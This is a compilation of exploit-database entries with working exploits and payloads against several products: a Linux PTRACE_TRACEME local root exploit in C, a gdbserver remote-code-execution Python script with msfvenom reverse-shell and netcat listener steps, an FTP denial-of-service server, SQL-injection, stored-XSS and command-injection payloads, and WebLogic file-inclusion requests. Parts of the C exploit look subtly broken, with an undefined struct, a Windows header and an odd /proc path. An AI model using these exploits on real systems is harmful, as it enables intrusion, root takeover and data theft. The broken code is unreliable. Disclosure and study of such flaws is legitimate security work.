<pre><code># Exploit Title: Oracle WebLogic Server 14.1.1.0.0 - Local File Inclusion<br /># Date: 25/1/2022<br /># Exploit Author: Jonah Tan (@picar0jsu)<br /># Vendor Homepage: https://www.oracle.com<br /># Software Link:<br />https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html<br /># Version: 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0<br /># Tested on: Windows Server 2019<br /># CVE : CVE-2022-21371<br /><br /># Description<br />Vulnerability in the Oracle WebLogic Server product of Oracle Fusion<br />Middleware (component: Web Container).<br />Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0<br />and 14.1.1.0.0.<br />Easily exploitable vulnerability allows unauthenticated attacker with<br />network access via HTTP to compromise Oracle WebLogic Server.<br />Successful attacks of this vulnerability can result in unauthorized access<br />to critical data or complete access to all Oracle WebLogic Server<br />accessible data.<br /><br /># PoC<br />GET .//META-INF/MANIFEST.MF<br />GET .//WEB-INF/web.xml<br />GET .//WEB-INF/portlet.xml<br />GET .//WEB-INF/weblogic.xml<br /><br /></code></pre>
<pre><code># Exploit Title: Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)<br /># Date: 11/22/21<br /># Exploit Author: Ujas Dhami<br /># Version: 4.19 - 5.2.1<br /># Platform: Linux<br /># Tested on:<br /># ~ Ubuntu 19.04 kernel 5.0.0-15-generic<br /># ~ Parrot OS 4.5.1 kernel 4.19.0-parrot1-13t-amd64<br /># ~ Kali Linux kernel 4.19.0-kali5-amd64<br /># CVE: CVE-2019-13272<br /><br />// ....<br />// Original discovery and exploit author: Jann Horn<br />// https://bugs.chromium.org/p/project-zero/issues/detail?id=1903<br />// Modified exploit code of: BColes<br />// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272<br />// ....<br />// ~ Uses the PolKit_Exec frontend.<br />// ~ PolKit_Action is branched.<br />// ~ Search is optimized.<br />// ~ Trunks attain search priority upon execution.<br />// ....<br />// ujas@kali:~$ gcc exploit_traceme.c -o exploit_traceme<br />// ujas@kali:~$ ./exploit_traceme<br />// Welcome to your Arsenal!<br />// accessing variables...<br />// execution has reached EOP.<br />// familiar trunks are been searched ...<br />// trunk helper found: /usr/sbin/mate-power-backlight-helper<br />// helper initiated: /usr/sbin/mate-power-backlight-helper<br />// SUID process is being initiated (/usr/bin/pkexec) ...<br />// midpid is being traced...<br />// midpid attached.<br />// root@kali:/home/ujas#<br />// ....<br /><br />#include <ctype.h><br />#include <assert.h><br />#include <conio.h><br />#include <stdio.h><br />#include <sys/syscall.h><br />#include <sys/stat.h><br />#include <fcntl.h><br />#include <sched.h><br />#include <stddef.h><br />#include <sys/user.h><br />#include <linux/elf.h><br />#include <stdarg.h><br />#include <pwd.h><br />#include <sys/prctl.h><br />#include <sys/wait.h><br />#include <sys/ptrace.h><br />#include <string.h><br />#include <stdlib.h><br />#include <unistd.h><br />#include <signal.h><br />#define _GNU_SOURCE<br /><br />#define DEBUG<br />#ifdef DEBUG<br />#define dprintf printf<br />#endif<br />#define max(a,b) ((a)>(b) ? (a) : (b))<br />#define eff(expr) ({ \<br /> typeof(expr) __res = (expr); \<br /> if (__res == -1) { \<br /> dprintf("[-] Error: %s\n", #expr); \<br /> return 0; \<br /> } \<br /> __res; \<br />})<br /><br />struct stat st;<br /><br />const char *trunk[1024];<br /><br />const char *trunks_rec[] = {<br /> "/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper",<br /> "/usr/sbin/mate-power-backlight-helper",<br /> "/usr/lib/gnome-settings-daemon/gsd-backlight-helper",<br /> "/usr/lib/gnome-settings-daemon/gsd-wacom-led-helper",<br /> "/usr/lib/unity-settings-daemon/usd-backlight-helper",<br /> "/usr/bin/xfpm-power-backlight-helper",<br /> "/usr/bin/lxqt-backlight_backend",<br /> "/usr/lib/gsd-backlight-helper",<br /> "/usr/lib/gsd-wacom-led-helper",<br /> "/usr/lib/gsd-wacom-oled-helper",<br /> "/usr/libexec/gsd-wacom-led-helper",<br /> "/usr/libexec/gsd-wacom-oled-helper",<br /> "/usr/libexec/gsd-backlight-helper",<br /> <br />};<br />static int trace_align[2];<br />static const char *path_exec = "/usr/bin/pkexec";<br />static const char *path_action = "/usr/bin/pkaction";<br />static int fd = -1;<br />static int pipe_stat;<br />static const char *term_sh = "/bin/bash";<br />static int mid_succ = 1;<br />static const char *path_doublealign;<br /><br />static char *tdisp(char *fmt, ...) {<br /> static char overlayfs[10000];<br /> va_list ap;<br /> va_start(ap, fmt);<br /> vsprintf(overlayfs, fmt, ap);<br /> va_end(ap);<br /> return overlayfs;<br />}<br /><br />static int middle_main(void *overlayfs) {<br /> prctl(PR_SET_PDEATHSIG, SIGKILL);<br /> pid_t middle = getpid();<br /> fd = eff(open("/proc/_fd/exe", O_RDONLY));<br /> pid_t child = eff(fork());<br /> <br /> if (child == 0) {<br /> prctl(PR_SET_PDEATHSIG, SIGKILL);<br /><br /> eff(dup2(fd, 42));<br /> int proc_fd = eff(open(tdisp("/proc/%d/status", middle), O_RDONLY));<br /> char *threadv = tdisp("\nUid:\t%d\t0\t", getuid());<br /> eff(ptrace(PTRACE_TRACEME, 0, NULL, NULL));<br /> execl(path_exec, basename(path_exec), NULL);<br /> while (1) {<br /> char overlayfs[1000];<br /> ssize_t buflen = eff(pread(proc_fd, overlayfs, sizeof(overlayfs)-1, 0));<br /> overlayfs[buflen] = '\0';<br /> if (strstr(overlayfs, threadv)) break;<br /> }<br /><br /> dprintf("SUID execution failed.");<br /> exit(EXIT_FAILURE);<br /> }<br /><br /> eff(dup2(fd, 0));<br /> eff(dup2(trace_align[1], 1));<br /><br /> struct passwd *pw = getpwuid(getuid());<br /> if (pw == NULL) {<br /> dprintf("err: username invalid/failed to fetch username");<br /> exit(EXIT_FAILURE);<br /> }<br /><br /> mid_succ = 1;<br /> execl(path_exec, basename(path_exec), "--user", pw->pw_name,<br /> path_doublealign,<br /> "--help", NULL);<br /> mid_succ = 0;<br /> dprintf("err: pkexec execution failed.");<br /> exit(EXIT_FAILURE);<br />}<br /><br />static int timeexecbuffer(pid_t pid, int exec_fd, char *arg0) {<br /> struct user_regs_struct regs;<br /> struct exeio exev = { .iov_base = &regs, .iov_len = sizeof(regs) };<br /> eff(ptrace(PTRACE_SYSCALL, pid, 0, NULL));<br /> eff(waitpid(pid, &pipe_stat, 0));<br /> eff(ptrace(PTRACE_GETREGSET, pid, NT_PRSTATUS, &exev));<br /><br /> unsigned long inject_surface = (regs.rsp - 0x1000) & ~0xfffUL;<br /> struct injected_page {<br /> unsigned long inj_arse[2];<br /> unsigned long environment[1];<br /> char arg0[8];<br /> char path[1];<br /> } ipage = {<br /> .inj_arse = { inject_surface + offsetof(struct injected_page, arg0) }<br /> };<br /> strcpy(ipage.arg0, arg0);<br /> for (int i = 0; i < sizeof(ipage)/sizeof(long); i++) {<br /> unsigned long pro_d = ((unsigned long *)&ipage)[i];<br /> eff(ptrace(PTRACE_POKETEXT, pid, inject_surface + i * sizeof(long),<br /> (void*)pro_d));<br /> }<br /><br /> eff(ptrace(PTRACE_SETREGSET, pid, NT_PRSTATUS, &exev));<br /> eff(ptrace(PTRACE_DETACH, pid, 0, NULL));<br /> eff(waitpid(pid, &pipe_stat, 0));<br /> <br /> regs.orig_rax = __NR_execveat;<br /> regs.rdi = exec_fd;<br /> regs.rsi = inject_surface + offsetof(struct injected_page, path);<br /> regs.rdx = inject_surface + offsetof(struct injected_page, inj_arse);<br /> regs.r10 = inject_surface + offsetof(struct injected_page, environment);<br /> regs.r8 = AT_EMPTY_PATH;<br />}<br /><br />static int stag_2(void) {<br /> pid_t child = eff(waitpid(-1, &pipe_stat, 0));<br /> timeexecbuffer(child, 42, "stage3");<br /> return 0;<br />}<br /><br />static int sh_spawn(void) {<br /> eff(setresgid(0, 0, 0));<br /> eff(setresuid(0, 0, 0));<br /> execlp(term_sh, basename(term_sh), NULL);<br /> dprintf("err: Shell spawn unsuccessful.", term_sh);<br /> exit(EXIT_FAILURE);<br />}<br /><br />static int check_env(void) {<br /> const char* xdg_session = getenv("XDG_SESSION_ID");<br /><br /> dprintf("accessing variables...\n");<br /><br /> if (stat(path_action, &st) != 0) {<br /> dprintf("err: pkaction not found at %s.", path_action);<br /> exit(EXIT_FAILURE);<br /> }<br /> if (system("/bin/loginctl --no-ask-password show-session $XDG_SESSION_ID | /bin/grep Remote=no >>/dev/null 2>>/dev/null") != 0) {<br /> dprintf("warn: PolKit agent not found.\n");<br /> return 1;<br /> }<br /> if (stat("/usr/sbin/getsebool", &st) == 0) {<br /> if (system("/usr/sbin/getsebool deny_ptrace 2>1 | /bin/grep -q on") == 0) {<br /> dprintf("warn: [deny_ptrace] is enabled.\n");<br /> return 1;<br /> }<br /> }<br /> if (xdg_session == NULL) {<br /> dprintf("warn: $XDG_SESSION_ID is not set.\n");<br /> return 1;<br /> }<br /> if (stat(path_exec, &st) != 0) {<br /> dprintf("err: pkexec not found at %s.", path_exec);<br /> exit(EXIT_FAILURE);<br /> }<br /> <br /> dprintf("execution has reached EOP.\n");<br /><br /> return 0;<br />}<br /><br />int trunkh() {<br /> char cmd[1024];<br /> snprintf(cmd, sizeof(cmd), "%s --verbose", path_action);<br /> FILE *fp;<br /> fp = popen(cmd, "r");<br /> if (fp == NULL) {<br /> dprintf("err: Failed to run %s.\n", cmd);<br /> exit(EXIT_FAILURE);<br /> }<br /><br /> char line[1024];<br /> char buffer[2048];<br /> int helper_index = 0;<br /> int useful_action = 0;<br /> static const char *threadv = "org.freedesktop.policykit.exec.path -> ";<br /> int needle_length = strlen(threadv);<br /><br /> while (fgets(line, sizeof(line)-1, fp) != NULL) {<br /> if (strstr(line, "implicit active:")) {<br /> if (strstr(line, "yes")) {<br /> useful_action = 1;<br /> }<br /> continue;<br /> }<br /><br /> if (useful_action == 0)<br /> continue;<br /> useful_action = 0;<br /><br /> int length = strlen(line);<br /> char* found = memmem(&line[0], length, threadv, needle_length);<br /> if (found == NULL)<br /> continue;<br /><br /> memset(buffer, 0, sizeof(buffer));<br /> for (int i = 0; found[needle_length + i] != '\n'; i++) {<br /> if (i >= sizeof(buffer)-1)<br /> continue;<br /> buffer[i] = found[needle_length + i];<br /> }<br /><br /> if (stat(&buffer[0], &st) != 0)<br /> continue;<br /> <br /> if (strstr(&buffer[0], "/xf86-video-intel-backlight-helper") != 0 ||<br /> strstr(&buffer[0], "/cpugovctl") != 0 ||<br /> strstr(&buffer[0], "/package-system-locked") != 0 ||<br /> strstr(&buffer[0], "/cddistupgrader") != 0) {<br /> dprintf("blacklisted thread helper ignored: %s\n", &buffer[0]);<br /> continue;<br /> }<br /><br /> trunk[helper_index] = strndup(&buffer[0], strlen(buffer));<br /> helper_index++;<br /><br /> if (helper_index >= sizeof(trunk)/sizeof(trunk[0]))<br /> break;<br /> }<br /><br /> pclose(fp);<br /> return 0;<br />}<br /><br />int root_ptraceme() {<br /> dprintf("helper initiated: %s\n", path_doublealign);<br /><br /> eff(pipe2(trace_align, O_CLOEXEC|O_DIRECT));<br /> eff(fcntl(trace_align[0], F_SETPIPE_SZ, 0x1000));<br /> char overlayfs = 0;<br /> eff(write(trace_align[1], &overlayfs, 1));<br /><br /> dprintf("SUID process is being initiated(%s) ...\n", path_exec);<br /> static char stackv[1024*1024];<br /> pid_t midpid = eff(clone(middle_main, stackv+sizeof(stackv),<br /> CLONE_VM|CLONE_VFORK|SIGCHLD, NULL));<br /> if (!mid_succ) return 1;<br /> while (1) {<br /> int fd = open(tdisp("/proc/%d/comm", midpid), O_RDONLY);<br /> char overlayfs[16];<br /> int buflen = eff(read(fd, overlayfs, sizeof(overlayfs)-1));<br /> overlayfs[buflen] = '\0';<br /> *strchrnul(overlayfs, '\n') = '\0';<br /> if (strncmp(overlayfs, basename(path_doublealign), 15) == 0)<br /> break;<br /> usleep(100000);<br /> }<br /><br /> dprintf("midpid is being traced...\n");<br /> eff(ptrace(PTRACE_ATTACH, midpid, 0, NULL));<br /> eff(waitpid(midpid, &pipe_stat, 0));<br /> dprintf("midpid attached.\n");<br /><br /> timeexecbuffer(midpid, 0, "stage2");<br /> exit(EXIT_SUCCESS);<br />}<br /><br />int main(int argc, char **inj_arse) {<br /> if (strcmp(inj_arse[0], "stage2") == 0)<br /> return stag_2();<br /> if (strcmp(inj_arse[0], "stage3") == 0)<br /> return sh_spawn();<br /><br /> dprintf("Welcome to your Arsenal!\n");<br /><br /> check_env();<br /><br /> if (argc > 1 && strcmp(inj_arse[1], "check") == 0) {<br /> exit(0);<br /> }<br /> <br /> dprintf("efficient trunk is being searched...\n");<br /> trunkh();<br /> for (int i=0; i<sizeof(trunk)/sizeof(trunk[0]); i++) {<br /> if (trunk[i] == NULL)<br /> break;<br /><br /> if (stat(trunk[i], &st) == 0) {<br /> path_doublealign = trunk[i];<br /> root_ptraceme();<br /> }<br /> }<br /><br /> dprintf("familiar trunks are been searched ...\n");<br /> for (int i=0; i<sizeof(trunks_rec)/sizeof(trunks_rec[0]); i++) {<br /> if (stat(trunks_rec[i], &st) == 0) {<br /> path_doublealign = trunks_rec[i];<br /> dprintf("trunk helper found: %s\n", path_doublealign);<br /> root_ptraceme();<br /> }<br /> }<br /><br /> return 0;<br />}<br /> <br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin Mortgage Calculators WP 1.52 - Stored Cross-Site Scripting (XSS) (Authenticated)<br /># Date: 25-10-2021<br /># Exploit Author: Ceylan Bozogullarindan<br /># Vendor Homepage: https://lenderd.com/<br /># Software Link: https://mortgagecalculatorsplugin.com/<br /># Version: 1.52<br /># Tested on: Linux<br /># CVE : CVE-2021-24904 (https://wpscan.com/vulnerability/7b80f89b-e724-41c5-aa03-21d1eef50f21)<br /><br /><br /># Description:<br />The plugin gives users real-time estimates by providing mortgage calculators. It does not implement any sanitisation on the color value of the background of a calculator in admin panel, which could lead to authenticated Stored Cross-Site Scripting issues. An attacker can execute malicious javascript codes for all visitors of a page containing the calculator.<br /><br /><br /># Steps To Reproduce:<br />1. Go to settings page available under the "Calculator" menu item.<br />2. Click the "Select Color" button and type the following payload the input space: `hacked</style></head><script>alert(1)</script>`<br />3. Click the "Save Changes" button to save settings.<br />4. Create a new page and add the shortcode ([mcwp type="cv"]) of the calculator, for testing.<br />5. Visit the page to trigger XSS.<br /><br /></code></pre>
<pre><code># Exploit Title: Webrun 3.6.0.42 - 'P_0' SQL Injection<br /># Google Dork: intitle:"Webrun 3.6.0.42"<br /># Date: 23/11/2021<br /># Exploit Author: Vinicius Alves<br /># Vendor Homepage: https://softwell.com.br/<br /># Version: 3.6.0.42<br /># Tested on: Kali Linux 2021.3<br /><br />=-=-=-= Description =-=-=-=<br /><br /><br />Webrun version 3.6.0.42 is vulnerable to SQL Injection, applied to the P_0<br />parameter used to set the username during the login process.<br /><br /><br />=-=-=-= Exploiting =-=-=-=<br /><br /><br />In the post request, change the P_0 value to the following payload:<br />121')+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+('AYkd'%3d'AYkd<br /><br /><br />You will see some information like below:<br /><br /><br />interactionError('ERRO: sintaxe de entrada é inválida para tipo numeric:<br />\"qvvxq1qbzbq\"', null, null, null, '<b><br /><br /><br />=-=-=-= POC =-=-=-=<br /><br /><br />If the return has the value 'qvvxq1qbzbq', you will be able to successfully<br />exploit this.<br /><br /><br />See an example of the complete POST parameter:<br /><br /><br />action=executeRule&pType=2&ruleName=GES_FLX_Gerar+Token+Dashboard&sys=GES&formID=8265&parentRID=-1&P_0=121')+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+('AYkd'%3d'AYkd&P_1=pwd<br /><br /></code></pre>
<pre><code>#!/usr/bin/env python<br />#<br />#<br /># Fetch Softworks Fetch FTP Client 5.8 Remote CPU Consumption (Denial of Service)<br />#<br />#<br /># Vendor: Fetch Softworks<br /># Product web page: https://www.fetchsoftworks.com<br /># Affected version: 5.8.2 (5K1354)<br />#<br /># Summary: Fetch is a reliable, full-featured file transfer client for the<br /># Apple Macintosh whose user interface emphasizes simplicity and ease of use.<br /># Fetch supports FTP and SFTP, the most popular file transfer protocols on<br /># the Internet for compatibility with thousands of Internet service providers,<br /># web hosting companies, publishers, pre-press companies, and more.<br />#<br /># Desc: The application is prone to a DoS after receiving a long server response<br /># (more than 2K bytes) leading to 100% CPU consumption.<br />#<br /># --------------------------------------------------------------------------------<br /># ~/Desktop> ps ucp 3498<br /># USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND<br /># lqwrm 3498 100.0 0.5 60081236 54488 ?? R 5:44PM 4:28.97 Fetch-5K1354-266470421<br /># ~/Desktop> <br /># --------------------------------------------------------------------------------<br />#<br /># Tested on: macOS Monterey 12.2<br /># macOS Big Sur 11.6.2<br />#<br />#<br /># Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /># @zeroscience<br />#<br />#<br /># Advisory ID: ZSL-2022-5696<br /># Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5696.php<br />#<br />#<br /># 27.01.2022<br />#<br /><br />import socket<br /><br />host = '0.0.0.0'<br />port = 21<br /><br />s = socket.socket()<br />s.bind((host, port))<br />s.listen(2)<br /><br />print('Ascolto su', host, 'porta', port, '...')<br /><br />consumptor = '220\x20'<br />consumptor += 'ftp.zeroscience.mk'<br />consumptor += '\x00' * 0x101E<br />consumptor += '\x0D\x0A'<br /><br />while True:<br /> try:<br /> c, a = s.accept()<br /> print('Connessione da', a)<br /> print('CPU 100%, Memory++')<br /> c.send(bytes(consumptor, 'UTF-8'))<br /> c.send(b'Thricer OK, p\'taah\x0A\x0D')<br /> print(c.recv(17))<br /> except:<br /> break<br /></code></pre>
<pre><code># Exploit Title: FLEX 1085 Web 1.6.0 - HTML Injection<br /># Date: 2021-11-21<br /># Exploit Author: Mr Empy<br /># Vendor Homepage: https://www.tem.ind.br/<br /># Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94<br /># Version: 1.6.0<br /># Tested on: Android<br /><br /><br />Title:<br />================<br />FLEX 1085 Web - HTML Injection<br /><br />Summary:<br />================<br />The FLEX 1085 Web appliance is vulnerable to an HTML injection attack that<br />allows the injection of arbitrary HTML code.<br /><br /><br />Severity Level:<br />================<br />5.3 (Medium)<br />CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N<br /><br /><br />Vulnerability Disclosure Schedule:<br />============================<br />* October 19, 2021: An email was sent to support at 6:08MP.<br /><br />* November 20, 2021: I didn't get any response from support.<br /><br />* November 21, 2021: Vulnerability Disclosure<br /><br /><br />Affected Product:<br />================<br />FLEX 1085 Web v1.6.0<br /><br /><br />Steps to Reproduce:<br />================<br /><br />1. Open your browser and search for your device's IP address (http://<IP>).<br /><br />2. Log in to the device's dashboard and go to "WiFi".<br /><br />3. Use another device that has an access point and create a Wi-Fi network<br />called "<h1>HTML Injection</h1>" (no double quotes) and activate the access<br />point. (https://prnt.sc/20e4y88)<br /><br />4. Go back to the FLEX device and when scanning the new WiFi networks, the<br />new network will appear written "HTML Injection" in bold and with a larger<br />font size. (http://prnt.sc/20e51li)<br /><br /></code></pre>
<pre><code>KL-001-2022-002: Moxa TN-5900 Post Authentication Command Injection Vulnerability<br /><br />Title: Moxa TN-5900 Post Authentication Command Injection Vulnerability<br />Advisory ID: KL-001-2022-002<br />Publication Date: 2022.01.28<br />Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2022-002.txt<br /><br /><br />1. Vulnerability Details<br /><br /> Affected Vendor: Moxa<br /> Affected Product: TN-5900<br /> Affected Version: v3.1 and prior<br /> Platform: Moxa Linux<br /> CWE Classification: CWE-78 Improper Neutralization of Special<br /> Elements used in an OS Command<br /> ('OS Command Injection')<br /> CVE ID: CVE-2021-46560<br /><br /><br />2. Vulnerability Description<br /><br /> A user who has authenticated to the management web application<br /> is able to leverage a command injection vulnerability in the<br /> p12 processing code of the certificate management function<br /> web_CERMGMTUpload.<br /><br /><br />3. Technical Description<br /><br /> Following authentication, the webs_CERMGMTUpload API method<br /> becomes accessible. This method takes a multi-part HTTP POST<br /> request containing four parameters. The cer_pw parameter does<br /> not properly neutralize special elements used in operating<br /> system commands and therefore it is possible to include<br /> encapsulated commands to be executed. In the request below,<br /> the cer_pw parameter has been written such that when executed<br /> by the operating system a zero byte file will appear in the<br /> /tmp directory. See the Proof of Concept section.<br /><br /> The relevant pseudo-c for this API method is included below. The<br /> websGetVar function is used to retrieve the cer_pw parameter and<br /> copies the value into the pass variable. The opcode (mgmtmode)<br /> is then compared to the number 2 and when true will prepare a<br /> command to be passed to system using the sprintf function. When<br /> preparing this command, the pass variable (cer_pw) is included<br /> without prior first sanitizing the user input.<br /><br /> void web_CERMGMTUpload(longlong *param_1,undefined8 param_2,undefined8 param_3) {<br /> ...<br /> __nptr = websGetVar(param_1,"mgmtmode",&DAT_120064f68);<br /> opcode = atoi(__nptr);<br /> __s = websGetVar(param_1,"cer_file",&DAT_120063dd0);<br /> local_338 = websGetVar(param_1,"cer_name",&DAT_120063dd0);<br /> if ((*local_338 == '\0') || (lVar1 = Ssys_CheckString(local_338), -1 < lVar1)) {<br /> sVar2 = strlen(__s);<br /> if (CONCAT44(extraout_v0_hi,sVar2) < 0x41) {<br /> ...<br /> sVar4 = strlen(local_338);<br /> if (CONCAT44(extraout_v0_hi_00,sVar4) < 0x41) {<br /> ...<br /> if (opcode == 2) {<br /> memset(pass,0,0x41);<br /> __s = websGetVar(param_1,"cer_pw",&DAT_120063dd0);<br /> strncpy(pass,__s,0x20);<br /> ...<br /> }<br /> ...<br /> __fd = open(inFile,0x102);<br /> if (__fd < 0) {<br /> ...<br /> }<br /> else {<br /> sVar3 = write(__fd,param_1[0x38],*(param_1 + 0x39));<br /> ...<br /> else {<br /> if (opcode == 2) {<br /> outFile = FUN_120038e28(&local_159);<br /> snprintf(cmd,0x100,<br /> "openssl pkcs12 -in \"%s\" -out %s -passout pass:%s -password pass:%s",inFile<br /> ,outFile,pass,pass);<br /> system(cmd);<br /> ...<br /> }<br /> ...<br /> }<br /><br /> Using a debugger we can see the command as it was<br /> programmatically created using our malicious input. This<br /> command is passed to the system function.<br /><br /> (gdb) x/25s $a0<br /> 0xfffbddb284: "openssl pkcs12 -in \"/mnt/log1/p12_file/test.p12\" -out /mnt/ramdisk/p12_tmpfile.pem -passout<br />pass:`touch /tmp/korelogic` -password pass:`touch /tmp/korelogic`"<br /> <br /> The file has been created.<br /> <br /> # ls -la /tmp/korelogic<br /> -rwxr-xr-x 1 root root 8072 Sep 23 20:30 korelogic<br /> <br /> It should be noted that the cer_name is exploitable as well.<br /><br /><br />4. Mitigation and Remediation Recommendation<br /><br /> The vendor has released a patch which remediates the described<br /> vulnerability. Release notes are available at:<br /><br /> https://www.moxa.com/en/support/product-support/security-advisory/tn-5900-secure-routers-vulnerabilities<br /><br /><br />5. Credit<br /><br /> This vulnerability was discovered by Matt Bergin (@thatguylevel)<br /> and Josh Hardin of KoreLogic, Inc.<br /><br /><br />6. Disclosure Timeline<br /><br /> 2021.02.05 - KoreLogic submits vulnerability details to Moxa.<br /> 2021.02.08 - Moxa acknowledges receipt and the intention to<br /> investigate.<br /> 2021.03.02 - Moxa notifies KoreLogic that a patch for this<br /> vulnerability is expected to be available in June 2021.<br /> 2021.04.16 - 45 business days have elapsed since KoreLogic reported<br /> this vulnerability to the vendor.<br /> 2021.06.07 - KoreLogic requests update on the status of the<br /> proposed TN-5900 patch.<br /> 2021.06.15 - Moxa informs KoreLogic that the patch is expected to be released in mid-July 2021.<br /> 2021.06.23 - 90 business days have elapsed since KoreLogic reported<br /> this vulnerability to the vendor.<br /> 2021.07.25 - Moxa informs KoreLogic that the patch is expected to be released in mid-August 2021.<br /> 2021.09.22 - 150 business days have elapsed since KoreLogic reported<br /> this vulnerability to the vendor.<br /> 2021.12.21 - 210 business days have elapsed since KoreLogic reported<br /> this vulnerability to the vendor.<br /> 2021.12.27 - Moxa notified KoreLogic that the patch is complete and ready for release..<br /> 2021.12.28 - Moxa public acknowledgement.<br /> 2022.01.25 - KoreLogic requests CVE from Mitre.<br /> 2022.01.28 - KoreLogic public disclosure.<br /><br /><br />7. Proof of Concept<br /><br /> POST /goform/web_CERMGMTUpload HTTP/1.1<br /> Host: [redacted]:80<br /> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br /> Accept-Language: en-US,en;q=0.5<br /> Accept-Encoding: gzip, deflate<br /> ...<br /> Connection: keep-alive<br /> Content-Type: multipart/form-data; boundary=---------------------------9051914041544843365972754266<br /> Content-Length: 605<br /> <br /> -----------------------------9051914041544843365972754266<br /> Content-Disposition: form-data; name="mgmtmode"<br /> <br /> 2<br /> -----------------------------9051914041544843365972754266<br /> Content-Disposition: form-data; name="cer_file";<br /> Content-Type: text/plain<br /> <br /> korelogic<br /> -----------------------------9051914041544843365972754266<br /> Content-Disposition: form-data; name="cer_name";<br /> Content-Type: text/plain<br /> <br /> test.p12<br /> -----------------------------9051914041544843365972754266<br /> Content-Disposition: form-data; name="cer_pw";<br /> <br /> `touch /tmp/korelogic`<br /> -----------------------------9051914041544843365972754266--<br /> <br /> HTTP/1.1 200 OK<br /> Server: GoAhead-Webs<br /> Pragma: no-cache<br /> Cache-control: no-cache<br /> Content-Type: text/html<br /><br /><br /><br />The contents of this advisory are copyright(c) 2022<br />KoreLogic, Inc. and are licensed under a Creative Commons<br />Attribution Share-Alike 4.0 (United States) License:<br />http://creativecommons.org/licenses/by-sa/4.0/<br /><br />KoreLogic, Inc. is a founder-owned and operated company with a<br />proven track record of providing security services to entities<br />ranging from Fortune 500 to small and mid-sized companies. We<br />are a highly skilled team of senior security consultants doing<br />by-hand security assessments for the most important networks in<br />the U.S. and around the world. We are also developers of various<br />tools and resources aimed at helping the security community.<br />https://www.korelogic.com/about-korelogic.html<br /><br />Our public vulnerability disclosure policy is available at:<br />https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt<br /><br /></code></pre>
<pre><code># Exploit Title: GNU gdbserver 9.2 - Remote Command Execution (RCE)<br /># Date: 2021-11-21<br /># Exploit Author: Roberto Gesteira Miñarro (7Rocky)<br /># Vendor Homepage: https://www.gnu.org/software/gdb/<br /># Software Link: https://www.gnu.org/software/gdb/download/<br /># Version: GNU gdbserver (Ubuntu 9.2-0ubuntu1~20.04) 9.2<br /># Tested on: Ubuntu Linux (gdbserver debugging x64 and x86 binaries)<br /><br />#!/usr/bin/env python3<br /><br /><br />import binascii<br />import socket<br />import struct<br />import sys<br /><br />help = f'''<br />Usage: python3 {sys.argv[0]} <gdbserver-ip:port> <path-to-shellcode><br /><br />Example:<br />- Victim's gdbserver -> 10.10.10.200:1337<br />- Attacker's listener -> 10.10.10.100:4444<br /><br />1. Generate shellcode with msfvenom:<br />$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 PrependFork=true -o rev.bin<br /><br />2. Listen with Netcat:<br />$ nc -nlvp 4444<br /><br />3. Run the exploit:<br />$ python3 {sys.argv[0]} 10.10.10.200:1337 rev.bin<br />'''<br /><br /><br />def checksum(s: str) -> str:<br /> res = sum(map(ord, s)) % 256<br /> return f'{res:2x}'<br /><br /><br />def ack(sock):<br /> sock.send(b'+')<br /><br /><br />def send(sock, s: str) -> str:<br /> sock.send(f'${s}#{checksum(s)}'.encode())<br /> res = sock.recv(1024)<br /> ack(sock)<br /> return res.decode()<br /><br /><br />def exploit(sock, payload: str):<br /> send(sock, 'qSupported:multiprocess+;qRelocInsn+;qvCont+;')<br /> send(sock, '!')<br /><br /> try:<br /> res = send(sock, 'vCont;s')<br /> data = res.split(';')[2]<br /> arch, pc = data.split(':')<br /> except Exception:<br /> print('[!] ERROR: Unexpected response. Try again later')<br /> exit(1)<br /><br /> if arch == '10':<br /> print('[+] Found x64 arch')<br /> pc = binascii.unhexlify(pc[:pc.index('0*')])<br /> pc += b'\0' * (8 - len(pc))<br /> addr = hex(struct.unpack('<Q', pc)[0])[2:]<br /> addr = '0' * (16 - len(addr)) + addr<br /> elif arch == '08':<br /> print('[+] Found x86 arch')<br /> pc = binascii.unhexlify(pc)<br /> pc += b'\0' * (4 - len(pc))<br /> addr = hex(struct.unpack('<I', pc)[0])[2:]<br /> addr = '0' * (8 - len(addr)) + addr<br /><br /> hex_length = hex(len(payload))[2:]<br /><br /> print('[+] Sending payload')<br /> send(sock, f'M{addr},{hex_length}:{payload}')<br /> send(sock, 'vCont;c')<br /><br /><br />def main():<br /> if len(sys.argv) < 3:<br /> print(help)<br /> exit(1)<br /><br /> ip, port = sys.argv[1].split(':')<br /> file = sys.argv[2]<br /><br /> try:<br /> with open(file, 'rb') as f:<br /> payload = f.read().hex()<br /> except FileNotFoundError:<br /> print(f'[!] ERROR: File {file} not found')<br /> exit(1)<br /><br /> with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:<br /> sock.connect((ip, int(port)))<br /> print('[+] Connected to target. Preparing exploit')<br /> exploit(sock, payload)<br /> print('[*] Pwned!! Check your listener')<br /><br /><br />if __name__ == '__main__':<br /> main()<br /> <br /></code></pre>
